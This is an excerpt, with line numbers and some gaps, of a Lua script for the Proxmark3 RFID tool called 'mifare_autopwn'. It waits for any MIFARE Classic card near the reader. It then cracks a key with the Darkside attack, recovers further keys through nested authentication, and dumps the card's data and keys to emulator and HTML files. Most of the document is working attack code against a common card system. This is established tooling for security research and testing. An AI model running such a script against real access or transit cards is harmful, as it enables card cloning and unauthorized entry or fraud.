1 local getopt = require('getopt')
2 local reader = require('read14a')
3 local cmds = require('commands')
5 example = "script run mifare_autopwn"
6 author = "Martin Holst Swende"
11 This is a which automates cracking and dumping mifare classic cards. It sets itself into
12 'listening'-mode, after which it cracks and dumps any mifare classic card that you
19 Output files from this operation:
20 <uid>.eml - emulator file
21 <uid>.html - html file containing card data
22 dumpkeys.bin - keys are dumped here. OBS! This file is volatile, as other commands overwrite it sometimes.
23 dumpdata.bin - card data in binary form. OBS! This file is volatile, as other commands (hf mf dump) overwrite it.
27 -------------------------------
29 -------------------------------
31 local MIFARE_AUTH_KEYA = 0x60
32 local MIFARE_AUTH_KEYB = 0x61
34 -- A debug printout-function
41 -- This is only meant to be used when errors occur
51 print("Example usage")
56 -- Waits for a mifare card to be placed within the vicinity of the reader.
57 -- @return if successfull: an table containing card info
58 -- @return if unsuccessfull : nil, error
59 function wait_for_mifare()
60 while not core.ukbhit() do
61 res, err = reader.read1443a()
62 if res then return res end
63 -- err means that there was no response from card
65 return nil, "Aborted by user"
69 core.clearCommandBuffer()
70 -- Build the mifare-command
71 local cmd = Command:new{cmd = cmds.CMD_READER_MIFARE, arg1 = 1, arg2 = 0, arg3 = MIFARE_AUTH_KEYA}
75 core.SendCommand(cmd:getBytes())
76 local key, errormessage = mfcrack_inner()
78 if key then return key end
80 if errormessage then return nil, errormessage end
81 -- Try again..set arg1 to 0 this time.
83 cmd = Command:new{cmd = cmds.CMD_READER_MIFARE, arg1 = 0, arg2 = 0, arg3 = MIFARE_AUTH_KEYA}
85 return nil, "Aborted by user"
88 function mfcrack_inner()
89 while not core.ukbhit() do
90 local result = core.WaitForResponseTimeout(cmds.CMD_ACK,1000)
94 I don't understand, they cmd and args are defined as uint32_t, however,
95 looking at the returned data, they all look like 64-bit things:
97 print("result", bin.unpack("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH", result))
99 FF 00 00 00 00 00 00 00 <-- 64 bits of data
100 FE FF FF FF 00 00 00 00 <-- 64 bits of data
101 00 00 00 00 00 00 00 00 <-- 64 bits of data
102 00 00 00 00 00 00 00 00 <-- 64 bits of data
103 04 7F 12 E2 00 <-- this is where 'data' starts
105 So below I use LI to pick out the "FEFF FFFF", don't know why it works..
107 -- Unpacking the arg-parameters
108 local count,cmd,isOK = bin.unpack('LI',result)
109 --print("response", isOK)--FF FF FF FF
110 if isOK == 0xFFFFFFFF then
111 return nil, "Button pressed. Aborted."
112 elseif isOK == 0xFFFFFFFE then
113 return nil, "Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests). You can try 'script run mfkeys' or 'hf mf chk' to test various known keys."
114 elseif isOK == 0xFFFFFFFD then
115 return nil, "Card is not vulnerable to Darkside attack (its random number generator is not predictable). You can try 'script run mfkeys' or 'hf mf chk' to test various known keys."
116 elseif isOK == 0xFFFFFFFC then
117 return nil, "The card's random number generator behaves somewhat weird (Mifare clone?). You can try 'script run mfkeys' or 'hf mf chk' to test various known keys."
118 elseif isOK ~= 1 then
119 return nil, "Error occurred"
123 -- The data-part is left
124 -- Starts 32 bytes in, at byte 33
125 local data = result:sub(33)
128 local get = function(num)
129 local x = data:sub(1,num)
130 data = data:sub(num+1)
134 local uid,nt,pl = get(4),get(4),get(8)
135 local ks,nr = get(8),get(4)
137 local status, key = core.nonce2key(uid, nt, nr, pl, ks)
138 if not status then return status,key end
141 print("Key not found (lfsr_common_prefix problem)")
149 return nil, "Aborted by user"
152 function nested(key,sak)
154 if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k
156 elseif 0x08 == sak then -- NXP MIFARE CLASSIC 1k | Plus 2k
158 elseif 0x09 == sak then -- NXP MIFARE Mini 0.3k
160 elseif 0x10 == sak then-- "NXP MIFARE Plus 2k"
162 elseif 0x01 == sak then-- "NXP MIFARE TNP3xxx 1K"
165 print("I don't know how many sectors there are on this type of card, defaulting to 16")
167 local cmd = string.format("hf mf nested %d 0 A %s d",typ,key)
172 core.console("hf mf dump")
173 -- Save the global args, those are *our* arguments
175 -- Set the arguments for htmldump script
176 args =("-o %s.html"):format(uid)
178 require('../scripts/htmldump')
182 require('../scripts/dumptoemul')
183 -- Set back args. Not that it's used, just for the karma...
188 -- The main entry point
191 local verbose, exit,res,uid,err,_,sak
193 local print_message = true
194 -- Read the parameters
195 for o, a in getopt.getopt(args, 'hd') do
196 if o == "h" then help() return end
197 if o == "d" then DEBUG = true end
201 if print_message then
202 print("Waiting for card or press any key to stop")
203 print_message = false
205 res, err = wait_for_mifare()
206 if err then return oops(err) end
210 if not seen_uids[uid] then
213 print("Card found, commencing crack on UID", uid)
217 if not res then return oops(err) end
218 -- The key is actually 8 bytes, so a
219 -- 6-byte key is sent as 00XXXXXX
220 -- This means we unpack it as first
221 -- two bytes, then six bytes actual key data
222 -- We can discard first and second return values
223 _,_,key = bin.unpack("H2H6",res)
224 print("Found valid key: "..key);